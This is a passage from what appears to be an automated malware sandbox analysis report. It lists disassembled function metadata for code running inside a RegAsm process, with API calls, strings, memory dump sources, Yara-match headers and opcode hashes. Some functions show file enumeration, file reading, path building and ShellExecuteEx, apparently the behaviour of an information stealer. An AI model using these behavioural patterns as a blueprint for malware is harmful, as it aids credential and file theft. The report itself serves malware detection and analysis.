                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000,?,6C804A68), ref: 6C83DEFE
                                                                                                                                                                                                                                                                                                  • ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C83DF38
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • [I %d/%d] locked_profiler_stop, xrefs: 6C83DE83
                                                                                                                                                                                                                                                                                                  • [I %d/%d] profiler_set_process_name("%s", "%s"), xrefs: 6C83E00E
                                                                                                                                                                                                                                                                                                  • <none>, xrefs: 6C83DFD7
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CurrentThread$getenv$ExclusiveLockProcessRelease_getpid$AcquireBufferEnterExit@mozilla@@Init_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@ProfilerRegisterTerminate__acrt_iob_func__stdio_common_vfprintffree
                                                                                                                                                                                                                                                                                                  • String ID: <none>$[I %d/%d] locked_profiler_stop$[I %d/%d] profiler_set_process_name("%s", "%s")
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • qx/FlyLkWE9mL8srMMmz5/UPMK9xP1WZ04111fV/Rkja1NWg6cb6VtV/uK9VRbxytKZyKf5qhIgBst9beX94T5X3GmkfI7v54+lMtz8C3exgfKMU51ZQCtnYo7arj/mcsaTwjzteq85cSKEe7/3Mt0JnZnl96TMPaGdm6r/vvlbV/evMLPfvv6fKW6/OzHT7GdCteInEzIyB9uNSDZKwE/0sEKGrDCsZRm3RTjXpDcU77Wm52SkeJnss8y1lF/Ohz0Fa, xrefs: 6C7F45B2
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: free$moz_xmalloc
                                                                                                                                                                                                                                                                                                  • String ID: qx/FlyLkWE9mL8srMMmz5/UPMK9xP1WZ04111fV/Rkja1NWg6cb6VtV/uK9VRbxytKZyKf5qhIgBst9beX94T5X3GmkfI7v54+lMtz8C3exgfKMU51ZQCtnYo7arj/mcsaTwjzteq85cSKEe7/3Mt0JnZnl96TMPaGdm6r/vvlbV/evMLPfvv6fKW6/OzHT7GdCteInEzIyB9uNSDZKwE/0sEKGrDCsZRm3RTjXpDcU77Wm52SkeJnss8y1lF/Ohz0Fa
                                                                                                                                                                                                                                                                                                  • API String ID: 3009372454-2846243242
                                                                                                                                                                                                                                                                                                  • Opcode ID: fe7d0be043b8a1511e1a521a0d05019b499d6127552232882d25dd88671e4b6a
                                                                                                                                                                                                                                                                                                  • Instruction ID: 52e22d06cbbd973c127078d574c65d6effa1cb61dedfccbb41ea7d2f062ecf6d
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fe7d0be043b8a1511e1a521a0d05019b499d6127552232882d25dd88671e4b6a
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ABB10372A041158FDB189E7CCBD476D77B2AF42328F180638E836DBB96D73098419B91
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C84D4F0
                                                                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C84D4FC
                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C84D52A
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C84D530
                                                                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C84D53F
                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C84D55F
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000), ref: 6C84D585
                                                                                                                                                                                                                                                                                                  • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C84D5D3
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C84D5F9
                                                                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C84D605
                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C84D652
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C84D658
                                                                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C84D667
                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C84D6A2
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2206442479-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 0255e3f880d46f8e11db843fdaa2752a69ec00a15a269acf662e788e2246c646
                                                                                                                                                                                                                                                                                                  • Instruction ID: 651e0dc9b18936324d3cb327fae5c8f0d5062ed1427013808ed959d8a297e9a2
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0255e3f880d46f8e11db843fdaa2752a69ec00a15a269acf662e788e2246c646
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 27517271604709DFC714DF34C588AAABBF5FF89318F10892EE85A87711EB30A945CBA1
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_APP_RESTART), ref: 6C8156D1
                                                                                                                                                                                                                                                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C8156E9
                                                                                                                                                                                                                                                                                                  • ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ.MOZGLUE ref: 6C8156F1
                                                                                                                                                                                                                                                                                                  • ?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6C815744
                                                                                                                                                                                                                                                                                                  • ??0TimeStampValue@mozilla@@AAE@_K0_N@Z.MOZGLUE(?,?,?,?,?), ref: 6C8157BC
                                                                                                                                                                                                                                                                                                  • GetTickCount64.KERNEL32 ref: 6C8158CB
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(6C87F688), ref: 6C8158F3
                                                                                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 6C815945
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(6C87F688), ref: 6C8159B2
                                                                                                                                                                                                                                                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(6C87F638,?,?,?,?), ref: 6C8159E9
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Time$CriticalSectionStampStamp@mozilla@@Value@mozilla@@$BaseComputeCount64DurationEnterFromLeaveMilliseconds@Now@PlatformProcessTickTicksUptime@Utils@mozilla@@V01@@V12@___aulldivgetenv
                                                                                                                                                                                                                                                                                                  • String ID: MOZ_APP_RESTART
                                                                                                                                                                                                                                                                                                  • API String ID: 2752551254-2657566371
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1519482839d138e184a707f9357b4aca4174cd60ec5ab780719262c0868bd060
                                                                                                                                                                                                                                                                                                  • Instruction ID: e1e6f333c8f02fc3b40f7ce6549b453c34b3cb9d48375536644935181ad20a7b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1519482839d138e184a707f9357b4aca4174cd60ec5ab780719262c0868bd060
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DAC19E31A0C3519FC726CF28C54466EB7F1BFDA718F158A2DE4C497A20E730A885CB92
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,004276A4), ref: 00416D7C
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,004276A8), ref: 00416D96
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,0156F8D8), ref: 00416DD4
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,0156F8B8), ref: 00416DE8
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00416DFC
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00416E0A
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,004276AC), ref: 00416E1C
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00416E30
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000), ref: 00406EB7
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: GetFileSizeEx.KERNEL32(00000000,?,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406ECD
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: LocalAlloc.KERNEL32(00000040,?,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406EE8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: ReadFile.KERNEL32(00000000,00000000,?,00000002,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406F01
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: CloseHandle.KERNEL32(00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406F29
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004153E0: Sleep.KERNEL32(000003E8,00422591,PdA,?,?,?,00000001), ref: 004154A5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004153E0: CreateThread.KERNEL32(00000000,00000000,00413E10,?,00000000,00000000), ref: 004154C6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004153E0: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004154D2
                                                                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 00416ED1
                                                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00416EE0
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcat$File$CloseCreateFind$AllocHandleLocalNextObjectReadSingleSizeSleepThreadWaitlstrcpy
                                                                                                                                                                                                                                                                                                  • String ID: 1pA
                                                                                                                                                                                                                                                                                                  • API String ID: 1847592606-4094451269
                                                                                                                                                                                                                                                                                                  • Opcode ID: 807796022c940539a05e88b5f1ee52cb58749088a7e0c81a81caed0ea8ee82df
                                                                                                                                                                                                                                                                                                  • Instruction ID: 27cb9206523c8af58370a1d4dfcfe0814bc062b05e3e05c97775bdae33b0a18a
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 807796022c940539a05e88b5f1ee52cb58749088a7e0c81a81caed0ea8ee82df
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9541C5B5900218ABDB14EBA0DC85FEE7739AF48700F0045AEF615A3190DB78A748CFE4
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,004276A4), ref: 00416D7C
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,004276A8), ref: 00416D96
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,0156F8D8), ref: 00416DD4
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,0156F8B8), ref: 00416DE8
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00416DFC
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00416E0A
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,004276AC), ref: 00416E1C
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00416E30
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000), ref: 00406EB7
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: GetFileSizeEx.KERNEL32(00000000,?,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406ECD
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: LocalAlloc.KERNEL32(00000040,?,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406EE8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: ReadFile.KERNEL32(00000000,00000000,?,00000002,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406F01
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: CloseHandle.KERNEL32(00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406F29
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004153E0: Sleep.KERNEL32(000003E8,00422591,PdA,?,?,?,00000001), ref: 004154A5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004153E0: CreateThread.KERNEL32(00000000,00000000,00413E10,?,00000000,00000000), ref: 004154C6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004153E0: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004154D2
                                                                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 00416ED1
                                                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00416EE0
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcat$File$CloseCreateFind$AllocHandleLocalNextObjectReadSingleSizeSleepThreadWaitlstrcpy
                                                                                                                                                                                                                                                                                                  • String ID: 1pA
                                                                                                                                                                                                                                                                                                  • API String ID: 1847592606-4094451269
                                                                                                                                                                                                                                                                                                  • Opcode ID: dfe88e1d95bf40144c7bd694240c5e7825ef60ad6c61e3464477d4b960d24aa2
                                                                                                                                                                                                                                                                                                  • Instruction ID: 51f963cb028a0e59156ed66b2066361993c6f2fce020c0753efefad7a9364b42
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dfe88e1d95bf40144c7bd694240c5e7825ef60ad6c61e3464477d4b960d24aa2
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D441A4B5900218ABDB14EBA0DC85BEE7739AF48700F0045AEF615A3190D778A748CFE0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C839420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C804A68), ref: 6C83945E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C839420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C839470
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C839420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C839482
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C839420: __Init_thread_footer.LIBCMT ref: 6C83949F
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C83EC84
                                                                                                                                                                                                                                                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C83EC8C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C8394D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C8394EE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C8394D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C839508
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C83ECA1
                                                                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(6C87F4B8), ref: 6C83ECAE
                                                                                                                                                                                                                                                                                                  • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6C83ECC5
                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C87F4B8), ref: 6C83ED0A
                                                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C83ED19
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 6C83ED28
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000), ref: 6C83ED2F
                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C87F4B8), ref: 6C83ED59
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • [I %d/%d] profiler_ensure_started, xrefs: 6C83EC94
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
                                                                                                                                                                                                                                                                                                  • String ID: [I %d/%d] profiler_ensure_started
                                                                                                                                                                                                                                                                                                  • API String ID: 4057186437-125001283
                                                                                                                                                                                                                                                                                                  • Opcode ID: 913337816c3f50dab1b4d75b6714727e0042f1f1ae76564badcc67b6ec143ec4
                                                                                                                                                                                                                                                                                                  • Instruction ID: 406344891564b9da85307de5a3a154a87272c1512662dcd38a8543ff896f4727
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 913337816c3f50dab1b4d75b6714727e0042f1f1ae76564badcc67b6ec143ec4
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6221D2716001289BDB329FA9DA0CAAF377AEB4526DF105A30F91897740EB359C15CBF1
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,01562F00,?), ref: 0041001C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411450: GetSystemTime.KERNEL32(?,0156F048,00427270,?,00000000,00000008,?,?,00000000,00421AA1,000000FF,?,0040460E,0041FDC9,00000014), ref: 004114A5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 0041352A
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
